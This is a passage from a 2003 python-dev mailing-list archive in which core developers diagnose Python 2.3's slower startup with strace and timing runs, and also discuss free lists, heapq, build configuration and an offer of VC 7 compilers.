Note two things: (a) the start time goes up over time, and (b) for
Python 2.3, -S doesn't make any difference.

Given that we often run very short Python programs, and e.g. Python's
popularity for CGI scripts, I find this increase in startup time very
worrysome, and worthy of our attention (more than gaining nanoseconds
on dict operations or even socket I/O speed).

My goal: I'd like Python 2.3(final) to start up at least as fast as
Python 2.2, and I'd like the much faster startup time back with -S.

I have no time to investigate the cause right now, although I have a
suspicion that the problem might be in loading too much of the
encoding framework at start time (I recall Marc-Andre and Martin
debating this earlier).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Tue May  6 13:32:03 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Tue,  6 May 2003 05:32:03 -0700
Subject: [Python-Dev] Re: heaps
Message-ID: <1052224323.3eb7ab43530a5@mcherm.com>

Zooko writes:
> Shouldn't heapq be a subclass of list?
  [...]
> One thing I don't know how to implement is:
> 
> # This changes mylist itself into a heapq -- it doesn't make a copy of mylist!
> makeheapq(mylist)
> 
> Perhaps this is a limitation of the current object model?  Or is there a way
> to change an object's type at runtime.

To change an object's CLASS, sure, but it's TYPE -- seems impossible to me on 
the face of it since a different type may have a different C layout. Now in
THIS case there's no need for a different C layout, so perhaps there's some
wierd trick I don't know, but I wouldn't think so.

As to your FIRST point though... the choice seems to be between making heapq
a subclass of list or a module for operating on a list. You argue that the
syntax will be cleaner, but comparing your examples:

> heap = []
> heappush(heap, item)
> item = heappop(heap)
> item = heap[0]

> heap = heapq()
> heap.push(item)
> item = heap.pop()
> item = heap[0]

I honestly see little meaningful difference. Since (as per earlier discussion)
heapq is NOT intended to be a abstract heap data type, I tend to prefer the
simpler solution (using a list instead of subclassing).

-- Michael Chermside



From tim.one@comcast.net  Tue May  6 16:47:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 11:47:46 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <3EB78863.5070105@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> If someone really care, I suppose that the garbage collector could
> do an occasional scan of the int free list and chop of the tail
> after a certain number of entries.

Int objects aren't allocated individually; malloc() is used to get single
"int blocks", which contain room for about 1000 ints at a time, and these
blocks are carved up internally by intobject.c.  So it isn't possible to
reclaim the space for a single int, so "tail" doesn't mean anything useful
in this context.

> FWIW, Unicode free lists have a cap to limit the number of entries
> in the list to 1024.

The Unicode freelist is more like the frameobject freelist that way (it is
possible to reclaim the space for an individual Unicode string or frame
object).



From skip@pobox.com  Tue May  6 16:55:25 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 10:55:25 -0500
Subject: [Python-Dev] testing with and without pyc files present
Message-ID: <16055.56045.277686.400944@montanaro.dyndns.org>

The test targets in the Makefile first delete any .py[co] files, then run
the test suite twice.  I know there must be a reason for this, but isn't
there a less sledgehammer-like and more explicit way to test whatever this
is trying to test?

Skip


From guido@python.org  Tue May  6 17:04:20 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 12:04:20 -0400
Subject: [Python-Dev] testing with and without pyc files present
In-Reply-To: Your message of "Tue, 06 May 2003 10:55:25 CDT."
 <16055.56045.277686.400944@montanaro.dyndns.org>
References: <16055.56045.277686.400944@montanaro.dyndns.org>
Message-ID: <200305061604.h46G4KR25972@odiug.zope.com>

> The test targets in the Makefile first delete any .py[co] files, then run
> the test suite twice.  I know there must be a reason for this, but isn't
> there a less sledgehammer-like and more explicit way to test whatever this
> is trying to test?

In the past, we've had problems where bugs in the marshalling or
elsewhere caused bytecode read from .pyc files to behave differently
than bytecode generated directly from a .py source file.  Sometimes
the bytecode read from a .pyc file had the bug, somtimes the directly
generated bytecode.  This is sometimes a very shy bug needing a lot of
sample data.  How else would you propose to test this?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Tue May  6 17:12:32 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 06 May 2003 18:12:32 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHIEGOFJAA.tim.one@comcast.net>
Message-ID: <3EB7DEF0.4020105@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>If someone really care, I suppose that the garbage collector could
>>do an occasional scan of the int free list and chop of the tail
>>after a certain number of entries.
> 
> Int objects aren't allocated individually; malloc() is used to get single
> "int blocks", which contain room for about 1000 ints at a time, and these
> blocks are carved up internally by intobject.c.  So it isn't possible to
> reclaim the space for a single int, so "tail" doesn't mean anything useful
> in this context.

Hmm, looking at the code it seems that the different blocks
are not referencing each other. Wouldn't it be possible to link
them together as list of blocks ? This list could then be used
for the review operation.

>>FWIW, Unicode free lists have a cap to limit the number of entries
>>in the list to 1024.
> 
> The Unicode freelist is more like the frameobject freelist that way (it is
> possible to reclaim the space for an individual Unicode string or frame
> object).

Probably :-)

Would using the block technique from the int implementation
make a difference for the frame objects ? I would guess that a
typical Python program rarely has more than 100 frames alive
at any one time. These could be placed into such a block to
make setting them up faster, possible making Python function
calls a tad snippier.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 06 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        49 days left



From skip@pobox.com  Tue May  6 17:16:45 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 11:16:45 -0500
Subject: [Python-Dev] testing with and without pyc files present
In-Reply-To: <200305061604.h46G4KR25972@odiug.zope.com>
References: <16055.56045.277686.400944@montanaro.dyndns.org>
 <200305061604.h46G4KR25972@odiug.zope.com>
Message-ID: <16055.57325.88910.417060@montanaro.dyndns.org>

    Guido> Sometimes the bytecode read from a .pyc file had the bug,
    Guido> somtimes the directly generated bytecode.  This is sometimes a
    Guido> very shy bug needing a lot of sample data.  How else would you
    Guido> propose to test this?

I have no idea, but the reason for the two test runs should probably be
documented somewhere.  I just embellished the comment in Makefile.pre.in
which preceed the test targets.

Skip


From skip@pobox.com  Tue May  6 17:20:34 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 11:20:34 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
Message-ID: <16055.57554.364845.689049@montanaro.dyndns.org>

I decided to investigate why the resource module wasn't getting built on my
Mac today.  A quick check showed that build.opt/pyconfig.h didn't include
this stanza:

    /* Define if you have the 'getpagesize' function. */
    #define HAVE_GETPAGESIZE 1

although pyconfig.h.in contained this stanza:

    /* Define if you have the 'getpagesize' function. */
    #undef HAVE_GETPAGESIZE

The date on pyconfig.h.in was May 5.  The date on build.opt/pyconfig.h was
Feb 27.  Executing

    ./config.status --recheck

in my build.opt tree doesn't regenerate pyconfig.h.  I then tried executing

    ../configure --prefix=/Users/skip/local

This generated pyconfig.h.  It would thus appear that config.status
shouldn't be used by developers.  Apparently one of the other flags it
appends to the generated configure command suppresses generation of
pyconfig.h (and maybe other files).

Skip



From jepler@unpythonic.net  Tue May  6 17:21:27 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 11:21:27 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030506162127.GC12791@unpythonic.net>

Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
aren't in 2.2.

The comparison is not fully valid because I'm running 2.3 from the
compilation directory, while 2.2 is being run from /usr/bin.

Results:
# Number of attempts to open a file
# Python-2.3b1 compiled with no special flags
$ strace -e open ./python -S -c pass 2>&1 | wc -l
    249
# RedHat 9's /usr/bin/python (based on 2.2.2)
$ strace -e open python -S -c pass 2>&1 | wc -l
    9

# Number of attempts to open an existing file
$ strace -e open python -S -c pass 2>&1 | grep -v ENOENT | wc -l
      8
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
     46

The modules imported in 2.3 are:
    warnings
    re
    sre
    sre_compile
    sre_constants
    sre_parse
    string
    copy_reg
    types
    linecache
    os
    posixpath
    stat
    UserDict
    codecs
    encodings.__init__
    encodings.utf_8

I'm crossing my fingers that the time to reload(m) is similar to the
time to import it in the first place, which gives these maybe-helpful
stats:
$ for i in warnings re sre sre_compile sre_constants sre_parse string copy_reg types linecache os posixpath stat UserDict  codecs encodings.__init__ encodings.utf_8; do echo -n "reload of module $i: "; ./python Lib/timeit.py -s "import $i" "reload($i)"; done
reload of module warnings: 1000 loops, best of 3: 495 usec per loop
reload of module re: 10000 loops, best of 3: 80.3 usec per loop
reload of module sre: 1000 loops, best of 3: 575 usec per loop
reload of module sre_compile: 1000 loops, best of 3: 503 usec per loop
reload of module sre_constants: 1000 loops, best of 3: 380 usec per loop
reload of module sre_parse: 1000 loops, best of 3: 701 usec per loop
reload of module string: 1000 loops, best of 3: 465 usec per loop
reload of module copy_reg: 10000 loops, best of 3: 200 usec per loop
reload of module types: 10000 loops, best of 3: 180 usec per loop
reload of module linecache: 10000 loops, best of 3: 156 usec per loop
reload of module os: 1000 loops, best of 3: 1.53e+03 usec per loop
reload of module posixpath: 1000 loops, best of 3: 403 usec per loop
reload of module stat: 10000 loops, best of 3: 157 usec per loop
reload of module UserDict: 1000 loops, best of 3: 454 usec per loop
reload of module codecs: 1000 loops, best of 3: 852 usec per loop
reload of module encodings.__init__: 1000 loops, best of 3: 244 usec per loop
reload of module encodings.utf_8: 10000 loops, best of 3: 132 usec per loop

These times seem pretty low, but maybe they're accurate.  "os" is the
worst of the lot (1530us) and the total comes to 7507us (7.5ms).  On my
system [2.4GHz Pentium4], this is a typical output of 'time' on python:
$ time ./python -S -c pass

real    0m0.249s
user    0m0.020s
sys     0m0.000s
$ time python -S -c pass

real    0m0.043s
user    0m0.010s
sys     0m0.000s

so the time to import these 17 modules does account for 3/4 of the
additional user time between 2.2.2 and 2.3. (Do you care about the 200ms
increase in "real" time, or just the user time?)

I tried compiling 2.3 with profiling, but gprof sees no samples ("Each
sample counts as 0.01 seconds.  no time accumulated").  I don't have
the capability to try oprofile right now either.

Jeff


From tim.one@comcast.net  Tue May  6 17:30:14 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 12:30:14 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <3EB7DEF0.4020105@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEHDFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> Hmm, looking at the code it seems that the different blocks
> are not referencing each other. Wouldn't it be possible to link
> them together as list of blocks ? This list could then be used
> for the review operation.

The blocks are linked together; that's what the _intblock.next pointer does.
See PyInt_Fini().

> Would using the block technique from the int implementation
> make a difference for the frame objects ? I would guess that a
> typical Python program rarely has more than 100 frames alive
> at any one time. These could be placed into such a block to
> make setting them up faster, possible making Python function
> calls a tad snippier.

frame objects have variable size; int objects have fixed size; variable size
objects don't play nice with fixed block sizes.  Note that the frame
allocation code already tries to reuse whatever initialization it can left
over from the frame object it (normally) pulls off the frame free list.



From info@nyc-search.com  Tue May  6 17:57:56 2003
From: info@nyc-search.com (NYC-SEARCH)
Date: Tue, 6 May 2003 12:57:56 -0400
Subject: [Python-Dev] Python Technical Lead, New York, NY - 80-85k
Message-ID: <01fd01c313f0$a41abb80$e0bfef18@earthlink.net>

Python Technical Lead, New York, NY - 80-85k - IMMEDIATE HIRE
http://www.nyc-search.com/jobs/python.html



From martin@v.loewis.de  Tue May  6 18:35:40 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 19:35:40 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> While Python's general speed has gone up, its startup speed has slowed
> down!

Hear hear! I always thought you didn't care about startup time at all
:-)

> I have no time to investigate the cause right now, although I have a
> suspicion that the problem might be in loading too much of the
> encoding framework at start time (I recall Marc-Andre and Martin
> debating this earlier).

That would be easy to determine: Just disable the block

#if defined(Py_USING_UNICODE) && defined(HAVE_LANGINFO_H) && defined(CODESET)

in pythonrun.c, and see whether it changes anything. To my knowledge,
this is the only cause of loading encodings during startup on Unix.

Regards,
Martin



From martin@v.loewis.de  Tue May  6 18:37:46 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 19:37:46 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506162127.GC12791@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
Message-ID: <m34r487z85.fsf@mira.informatik.hu-berlin.de>

Jeff Epler <jepler@unpythonic.net> writes:

> Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> aren't in 2.2.

Very interesting. Could you also try to find out the difference in
terms of stat calls?

> I'm crossing my fingers that the time to reload(m) is similar to the
> time to import it in the first place, which gives these maybe-helpful
> stats:

That is, unfortunately, not the case: reloading a dynamic module is a
no-op.

Regards,
Martin


From martin@v.loewis.de  Tue May  6 18:39:21 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 19:39:21 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16055.57554.364845.689049@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
Message-ID: <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> This generated pyconfig.h.  It would thus appear that config.status
> shouldn't be used by developers.  Apparently one of the other flags it
> appends to the generated configure command suppresses generation of
> pyconfig.h (and maybe other files).

Can you find out whether this is related to the fact that you are
building in a separate build directory?

Regards,
Martin



From aleax@aleax.it  Tue May  6 18:49:52 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 19:49:52 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <20030506162127.GC12791@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net>
Message-ID: <200305061949.52953.aleax@aleax.it>

On Tuesday 06 May 2003 06:21 pm, Jeff Epler wrote:
   ...
> # Number of attempts to open an existing file
> $ strace -e open python -S -c pass 2>&1 | grep -v ENOENT | wc -l
>       8
> $ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
>      46

Yes, same here (2.2.2 and 2.3 from CVS both built locally with Mdk 9.0).

Besides the .py and .pyc for all the modules, there's a few more files
that 2.3 is opening and 2.2 isn't:

early on:
open("/usr/lib/libstdc++.so.5", O_RDONLY) = 3
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3

in the midst of the imports (just before encodings/__init__.py):
open("/usr/share/locale/locale.alias", O_RDONLY) = 3
open("/usr/share/locale/en_US/LC_CTYPE", O_RDONLY) = 3


Alex



From aleax@aleax.it  Tue May  6 19:20:42 2003
From: aleax@aleax.it (Alex Martelli)
Date: Tue, 6 May 2003 20:20:42 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <m34r487z85.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net> <m34r487z85.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200305062020.42734.aleax@aleax.it>

On Tuesday 06 May 2003 07:37 pm, Martin v. Löwis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
> > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> > aren't in 2.2.
>
> Very interesting. Could you also try to find out the difference in
> terms of stat calls?

In general:

[alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | wc -l
     18
[alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | wc -l
     71
[alex@lancelot blm]$ strace -e fstat64 python2.2 -S -c pass 2>&1 | wc -l
      8
[alex@lancelot blm]$ strace -e fstat64 python2.3 -S -c pass 2>&1 | wc -l
     71
[alex@lancelot blm]$

Of the stat64 calls, the found-files only:

[alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | grep -v 
ENOENT | wc -l
      4
[alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | grep -v 
ENOENT | wc -l
     12


Alex



From guido@python.org  Tue May  6 19:26:07 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:26:07 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <200305061826.h46IQ7605750@odiug.zope.com>

A month ago at Python UK in Oxford (which was colocated with C and C++
standardization meetings as well as a general C and C++ users
conference) I met with some folks from Microsoft's VC development
team, including the project lead, Nick Hodapp.  I told Nick that
Python for Windows was still built using VC 6.  He pointed out that
the actual compilers (not the GUI) from VC 7 are freely downloadable.

More recently, Nick sent me an email offering to donate copies of VC 7
to the "key developers".  I count Tim, myself and Mark Hammond among
the key developers.  Is there anyone else who would count themselves
among those?

I presume he's offering the pro version, which has a real optimizer,
unlike the "standard" version that was kindly donated by Bjorn
Pettersen.

I can see advantages and disadvantages of moving to VC 7; I'm sure the
VC 7 compiler is more standard-compliant and generates faster code,
but a disadvantage is that you can't apparently link binaries built
with VC 6 to a program built with VC 7, meaning that 3rd party
extensions will have to be recompiled with VC 7 as well.  I have no
idea how many projects this will affect (don't worry about Zope Corp
:-).  Maybe we should try to include those 3rd party developers in the
deal.  (I think Robin Dunn would be affected, wxPython has a Windows
distribution.)

If you think this is a bad idea or if you would like to qualify for a
compiler donation, please follow up!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 19:27:53 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 20:27:53 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <200305061949.52953.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
 <200305061949.52953.aleax@aleax.it>
Message-ID: <m33cjs6ic6.fsf@mira.informatik.hu-berlin.de>

Alex Martelli <aleax@aleax.it> writes:

> in the midst of the imports (just before encodings/__init__.py):
> open("/usr/share/locale/locale.alias", O_RDONLY) = 3
> open("/usr/share/locale/en_US/LC_CTYPE", O_RDONLY) = 3

That is the effect of nl_langinfo(CODESET).

Regards,
Martin


From jepler@unpythonic.net  Tue May  6 19:36:00 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 6 May 2003 13:36:00 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <m34r487z85.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030506162127.GC12791@unpythonic.net> <m34r487z85.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030506183600.GA27125@unpythonic.net>

On Tue, May 06, 2003 at 07:37:46PM +0200, Martin v. L=F6wis wrote:
> Jeff Epler <jepler@unpythonic.net> writes:
>=20
> > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 that
> > aren't in 2.2.
>=20
> Very interesting. Could you also try to find out the difference in
> terms of stat calls?
# redhat's 9 2.2.2
$ strace -e stat64 python -S -c pass 2>&1 | wc -l
     11
# python.org's 2.3b1
$ strace -e stat64 ./python -S -c pass 2>&1 | wc -l
     72

By the way, I was able to account for the wall-time difference I saw
due to the fact that my PYTHONPATH contains some directories on NFS,
and so the attempted open()s and stat()s of standard modules did take
measurable wall time.

With no PYTHONPATH variable set, these are the startup timings I see:
# 2.2.2
real    0m0.005s
user    0m0.000s
sys     0m0.000s

# 2.3b2
real    0m0.044s
user    0m0.020s
sys     0m0.020s

By the way, I wouldn't be too excited about trusting this Python --
    ./python -c "import random"
    Illegal instruction
I wonder what's gone wrong...
(gdb) run -c "import random"
Starting program: /usr/src/Python-2.3b1/python -c "import random"
[New Thread 1074963072 (LWP 28408)]

Program received signal SIGILL, Illegal instruction.
[Switching to Thread 1074963072 (LWP 28408)]
0x08109aa0 in subtype_getsets_full ()
(gdb) where
#0  0x08109aa0 in subtype_getsets_full ()
#1  0x4001c743 in random_new (type=3D0x4001c738, args=3D0x4012c02c, kwds=3D=
0x0)
               at /usr/src/Python-2.3b1/Modules/_randommodule.c:439
(gdb) ptype subtype_getsets_full
type =3D struct PyGetSetDef {
[...]

I'm recompiling now to see if it was just a bogon strike.. surely somebod=
y
else has tested on redhat9!  nope, recompiled and I still have the proble=
m.
and I can't get the debugger to stop at the top of random_new either.

jeff


From neal@metaslash.com  Tue May  6 19:37:21 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Tue, 06 May 2003 14:37:21 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <200305062020.42734.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030506162127.GC12791@unpythonic.net>
 <m34r487z85.fsf@mira.informatik.hu-berlin.de>
 <200305062020.42734.aleax@aleax.it>
Message-ID: <20030506183721.GC1340@epoch.metaslash.com>

On Tue, May 06, 2003 at 08:20:42PM +0200, Alex Martelli wrote:
> On Tuesday 06 May 2003 07:37 pm, Martin v. L=F6wis wrote:
> > Jeff Epler <jepler@unpythonic.net> writes:
> > > Comparing 2.2 and 2.3, there are a lot of files opened in 2.3 t=
hat
> > > aren't in 2.2.
>=20
> [alex@lancelot blm]$ strace -e stat64 python2.2 -S -c pass 2>&1 | w=
c -l
>      18
> [alex@lancelot blm]$ strace -e stat64 python2.3 -S -c pass 2>&1 | w=
c -l
>      71

I think amny of the extra stat/open calls are due to zipimports.

I don't have python23.zip, but it's still looking for a bunch
of extra files that can't exist (in python23.zip).  Perhaps
if the zip file doesn't exist, we can short circuit the remaining
calls to open()?

stat64("/home/neal/local/lib/python23.zip/warnings", 0xbfffebc0) =
=3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.so", O_RDONLY|O_LARG=
EFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warningsmodule.so", O_RDONLY|=
O_LARGEFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.py", O_RDONLY|O_LARG=
EFILE) =3D -1 ENOENT (No such file or directory)
open("/home/neal/local/lib/python23.zip/warnings.pyc", O_RDONLY|O_LAR=
GEFILE) =3D -1 ENOENT (No such file or directory)

Neal



From nas@python.ca  Tue May  6 19:41:07 2003
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 6 May 2003 11:41:07 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <20030506184107.GA21470@glacier.arctrix.com>

Guido van Rossum wrote:
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

Can distutils use (or be made to use) the free command line VC 7 tools?
Also, does this affect whether extensions can be compiled by Mingw?  It
would be nice if people could continue building extensions on Windows
using free tools.

  Neil


From guido@python.org  Tue May  6 19:45:50 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:45:50 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 11:41:07 PDT."
 <20030506184107.GA21470@glacier.arctrix.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <200305061845.h46Ijo106044@odiug.zope.com>

> > I can see advantages and disadvantages of moving to VC 7; I'm sure the
> > VC 7 compiler is more standard-compliant and generates faster code,
> > but a disadvantage is that you can't apparently link binaries built
> > with VC 6 to a program built with VC 7, meaning that 3rd party
> > extensions will have to be recompiled with VC 7 as well.
> 
> Can distutils use (or be made to use) the free command line VC 7 tools?

That would be a project, but his implication was that the compilers
are usable as command line tools, so I'm confident it can be done.

> Also, does this affect whether extensions can be compiled by Mingw?
> It would be nice if people could continue building extensions on
> Windows using free tools.

I know noting about Mingw.  Anyone who does please speak up if this
would affect them or not.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From phil@riverbankcomputing.co.uk  Tue May  6 19:48:03 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Tue, 6 May 2003 19:48:03 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <200305061948.03757.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 7:26 pm, Guido van Rossum wrote:
> A month ago at Python UK in Oxford (which was colocated with C and C++
> standardization meetings as well as a general C and C++ users
> conference) I met with some folks from Microsoft's VC development
> team, including the project lead, Nick Hodapp.  I told Nick that
> Python for Windows was still built using VC 6.  He pointed out that
> the actual compilers (not the GUI) from VC 7 are freely downloadable.
>
> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?
>
> I presume he's offering the pro version, which has a real optimizer,
> unlike the "standard" version that was kindly donated by Bjorn
> Pettersen.
>
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.  I have no
> idea how many projects this will affect (don't worry about Zope Corp
>
> :-).  Maybe we should try to include those 3rd party developers in the
>
> deal.  (I think Robin Dunn would be affected, wxPython has a Windows
> distribution.)
>
> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!

How do we get hold of the free VC 7 compilers?

Phil


From theller@python.net  Tue May  6 19:48:12 2003
From: theller@python.net (Thomas Heller)
Date: 06 May 2003 20:48:12 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <20030506184107.GA21470@glacier.arctrix.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <20030506184107.GA21470@glacier.arctrix.com>
Message-ID: <he87x66r.fsf@python.net>

Neil Schemenauer <nas@python.ca> writes:

> Guido van Rossum wrote:
> > I can see advantages and disadvantages of moving to VC 7; I'm sure the
> > VC 7 compiler is more standard-compliant and generates faster code,
> > but a disadvantage is that you can't apparently link binaries built
> > with VC 6 to a program built with VC 7, meaning that 3rd party
> > extensions will have to be recompiled with VC 7 as well.
> 
> Can distutils use (or be made to use) the free command line VC 7 tools?

The only problem distutils has is to find the compiler and the
environment it needs. Currently it relies on (undocumented) registry
entries (for VC6), and there's a patch somewhere on SF for the registry
entries for VC7.

I like the idea of using VC7 (as much as I dislike the VC7 gui itself).
'Professional' windows developers have VC7 anyway, it's included in MSDN
professional.

Thomas



From logistix@cathoderaymission.net  Tue May  6 19:52:32 2003
From: logistix@cathoderaymission.net (logistix)
Date: Tue, 6 May 2003 13:52:32 -0500 (CDT)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>

On Tue, 6 May 2003, Guido van Rossum wrote:

> A month ago at Python UK in Oxford (which was colocated with C and C++
> standardization meetings as well as a general C and C++ users
> conference) I met with some folks from Microsoft's VC development
> team, including the project lead, Nick Hodapp.  I told Nick that
> Python for Windows was still built using VC 6.  He pointed out that
> the actual compilers (not the GUI) from VC 7 are freely downloadable.
> 
> More recently, Nick sent me an email offering to donate copies of VC 7
> to the "key developers".  I count Tim, myself and Mark Hammond among
> the key developers.  Is there anyone else who would count themselves
> among those?
> 
> I presume he's offering the pro version, which has a real optimizer,
> unlike the "standard" version that was kindly donated by Bjorn
> Pettersen.
> 
> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.  I have no
> idea how many projects this will affect (don't worry about Zope Corp
> :-).  Maybe we should try to include those 3rd party developers in the
> deal.  (I think Robin Dunn would be affected, wxPython has a Windows
> distribution.)
> 
> If you think this is a bad idea or if you would like to qualify for a
> compiler donation, please follow up!
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev
> 

Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
its considered VC8 or just VC7.1 with the same backend compilers.  But if 
you're going to upgrad, you might as well go all the way.

Also, I'm assuming 2.3 will still be compiled on 6.0, right?




From guido@python.org  Tue May  6 19:55:15 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 14:55:15 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 19:48:03 BST."
